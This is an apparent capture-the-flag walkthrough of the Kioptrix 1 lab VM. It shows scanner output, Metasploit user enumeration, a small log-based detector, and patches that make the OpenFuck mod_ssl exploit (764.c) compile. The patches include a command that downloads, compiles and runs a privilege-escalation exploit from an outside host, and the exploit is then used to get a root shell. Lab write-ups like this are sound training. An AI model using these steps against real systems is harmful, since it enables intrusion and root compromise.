Kioptrix 1
Setting up the challenge
Download VMware Workstation and the vulnerable VM, then start it.
Scanning with nmap
Finding the vulnerable machine
nmap 10.0.1.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)
The address is 10.0.1.104.
In depth scan
nmap -A 10.0.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 10.0.1.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds
Conclusion
Characteristic | Value |
---|---|
Operating System | Linux 2.4.X |
Kernel (OS CPE) | cpe:/o:linux:linux_kernel:2.4 |
OS details | Linux 2.4.9 - 2.4.18 (likely embedded) |
Samba | 139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP) |
SSH | OpenSSH 2.9p2 (protocol 1.99) |
Apache | Apache/1.3.20 (Unix) |
Scanning with dirb
dirb is used to find unlinked pages by requesting common paths from a wordlist.
dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)
+ http://10.0.1.104/~root (CODE:403|SIZE:269)
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://10.0.1.104/manual/
==> DIRECTORY: http://10.0.1.104/mrtg/
==> DIRECTORY: http://10.0.1.104/usage/
---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)
-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6
Found :
Type | Address | Response code | Response size |
---|---|---|---|
File | http://10.0.1.104/~operator | 403 | 273 |
File | http://10.0.1.104/~root | 403 | 269 |
File | http://10.0.1.104/cgi-bin/ | 403 | 272 |
File | http://10.0.1.104/index.html | 200 | 2890 |
Directory | http://10.0.1.104/manual/ | | |
Directory | http://10.0.1.104/mrtg/ | | |
Directory | http://10.0.1.104/usage/ | | |
Conclusion
There seem to be users named root and operator (the /~root and /~operator paths returned 403 rather than 404).
Scanning with OpenVAS
Install OpenVAS and use it to scan the address.
NVT Name | Port | Port Protocol | CVSS | Severity | CVEs |
---|---|---|---|---|---|
Webalizer Cross Site Scripting Vulnerability | 443 | tcp | 7.5 | High | CVE-2001-0835 |
Webalizer Cross Site Scripting Vulnerability | 80 | tcp | 7.5 | High | CVE-2001-0835 |
http TRACE XSS attack | 443 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567 |
http TRACE XSS attack | 80 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567 |
SSL/TLS: Certificate Expired | 443 | tcp | 5 | Medium | NOCVE |
SSL/TLS: Report Vulnerable Cipher Suites for HTTPS | 443 | tcp | 5 | Medium | CVE-2016-2183, CVE-2016-6329 |
Apache UserDir Sensitive Information Disclosure | 443 | tcp | 5 | Medium | CVE-2001-1013 |
Apache UserDir Sensitive Information Disclosure | 80 | tcp | 5 | Medium | CVE-2001-1013 |
SSL/TLS: Untrusted Certificate Authorities | 443 | tcp | 5 | Medium | NOCVE |
Apache Web Server ETag Header Information Disclosure Weakness | 443 | tcp | 4.3 | Medium | CVE-2003-1418 |
Apache Web Server ETag Header Information Disclosure Weakness | 80 | tcp | 4.3 | Medium | CVE-2003-1418 |
SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam) | 443 | tcp | 4.3 | Medium | CVE-2015-4000 |
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE) | 443 | tcp | 4.3 | Medium | CVE-2014-3566 |
SSL/TLS: Report Weak Cipher Suites | 443 | tcp | 4.3 | Medium | CVE-2013-2566, CVE-2015-2808, CVE-2015-4000 |
SSH Weak Encryption Algorithms Supported | 22 | tcp | 4.3 | Medium | NOCVE |
SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK) | 443 | tcp | 4.3 | Medium | CVE-2015-0204 |
SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection | 443 | tcp | 4.3 | Medium | CVE-2016-0800, CVE-2014-3566 |
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 443 | tcp | 4.3 | Medium | CVE-2012-0053 |
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 80 | tcp | 4.3 | Medium | CVE-2012-0053 |
SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability | 443 | tcp | 4 | Medium | NOCVE |
TCP timestamps | | | 2.6 | Low | NOCVE |
SSH Weak MAC Algorithms Supported | 22 | tcp | 2.6 | Low | NOCVE |
Scanning with nikto
Download or update nikto from GitHub.
./nikto.pl -h 10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv
Port | OSVDB | GET/POST | Path | Description |
---|---|---|---|---|
80 | | | | Server banner: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |
80 | OSVDB-0 | GET | / | Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001 |
80 | OSVDB-0 | GET | / | The anti-clickjacking X-Frame-Options header is not present. |
80 | OSVDB-0 | GET | / | The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
80 | OSVDB-0 | GET | / | The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
80 | OSVDB-27487 | GET | / | Apache is vulnerable to XSS via the Expect header |
80 | OSVDB-0 | OPTIONS | / | Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE |
80 | OSVDB-877 | TRACE | / | HTTP TRACE method is active, suggesting the host is vulnerable to XST |
80 | OSVDB-0 | GET | ///etc/hosts | The server install allows reading of any system file by adding an extra '/' to the URL. |
80 | OSVDB-682 | GET | /usage/ | Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
80 | OSVDB-3268 | GET | /manual/ | Directory indexing found. |
80 | OSVDB-3092 | GET | /manual/ | Web server manual found. |
80 | OSVDB-3268 | GET | /icons/ | Directory indexing found. |
80 | OSVDB-3233 | GET | /icons/README | Apache default file found. |
80 | OSVDB-3092 | GET | /test.php | This might be interesting… |
Additionally, nikto gives the following information:
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Apache UserDir Sensitive Information Disclosure
OpenVAS lists this finding as CVE-2001-1013:
Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
We open msfconsole to search for available modules:
msfconsole
msf> search CVE-2001-1013
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/apache_userdir_enum normal Apache "mod_userdir" User Enumeration
We use the available module:
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> show options
msf> set RHOSTS 10.0.1.104
msf> run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Conclusion
The system has the users operator, postgres and root.
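As an added example (not part of the original walkthrough), a defender-side check for the status-code oracle described above: it scans Apache access-log lines and flags any client that collected a mix of 403 (user exists, no public_html) and 404 (no such user) answers on /~user paths. The log lines are constructed for the example; the client IPs and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines (not captured from the VM). The 403s
# on /~root and /~operator mirror the dirb results above; the 404s are what
# Apache 1.3 returns for a non-existent user, which is the CVE-2001-1013 oracle.
SAMPLE_LOG = """\
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~root HTTP/1.1" 403 269
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~operator HTTP/1.1" 403 273
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~alice HTTP/1.1" 404 275
10.0.1.50 - - [17/Feb/2018:21:49:41 +0100] "GET /~bob HTTP/1.1" 404 275
10.0.1.50 - - [17/Feb/2018:21:49:41 +0100] "GET /~postgres HTTP/1.1" 403 273
10.0.1.50 - - [17/Feb/2018:21:49:41 +0100] "GET /~mail HTTP/1.1" 404 275
10.0.1.77 - - [17/Feb/2018:21:50:02 +0100] "GET /index.html HTTP/1.1" 200 2890
10.0.1.77 - - [17/Feb/2018:21:50:03 +0100] "GET /~root HTTP/1.1" 403 269
"""

# Common log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
USERDIR_RE = re.compile(r'^/~([A-Za-z0-9_.-]+)/?$')

def parse_line(line):
    """Return (client_ip, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method, path, int(status)

def detect_userdir_enum(log_text, threshold=5):
    """Flag clients that probed >= threshold /~user paths, splitting the names by
    answer: 403 = account exists without public_html, 404 = no such account.
    One client collecting both answers is the UserDir oracle being exercised."""
    per_ip = defaultdict(lambda: {"probed": 0, "existing": [], "missing": []})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _method, path, status = parsed
        m = USERDIR_RE.match(path)
        if not m:
            continue
        rec = per_ip[ip]
        rec["probed"] += 1
        if status == 403:
            rec["existing"].append(m.group(1))
        elif status == 404:
            rec["missing"].append(m.group(1))
    return {ip: rec for ip, rec in per_ip.items() if rec["probed"] >= threshold}
```

On the Kioptrix host the 403/404 difference itself goes away once the UserDir directive is disabled, which is the fix the CVE entry points at.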
mod_ssl buffer overflow
Source: Hypn.za.net
One of the popular boot-to-root VMs has an exploit (764.c) which doesn't compile so well in modern Kali, producing the errors:
764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:
764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
On Kali (and likely other Debian based distros) you can work around this by simply doing an “apt-get install libssl1.0-dev” to roll back your libssl-dev version, but why don’t we get this compiling with the modern lib…
The changes to make (including Paul's) are:
1) Add this below line 24 (the last #include):
#include <openssl/rc4.h>
#include <openssl/md5.h>
#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
2) Replace “COMMAND2” on (now) line 672:
#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
3) Add “const” to the beginning of (now) line 970:
const unsigned char *p, *end;
4) Replace the “if” on (now) line 1078 with:
if (EVP_PKEY_get1_RSA(pkey) == NULL) {
...}
5) Replace the “encrypted_key_length” code on (now) line 1084 with:
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
6) Install “libssl-dev” (if not already installed):
apt-get install libssl-dev
7) Compile!
gcc -o 764 764.c -lcrypto
Exploiting the overflow
We display the usage with ./764:
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Usage: ./764 target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
...
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
From the information gathered we exploit the vulnerability with:
./764 0x6b 10.0.1.104 443
From there we now have a remote shell with root access!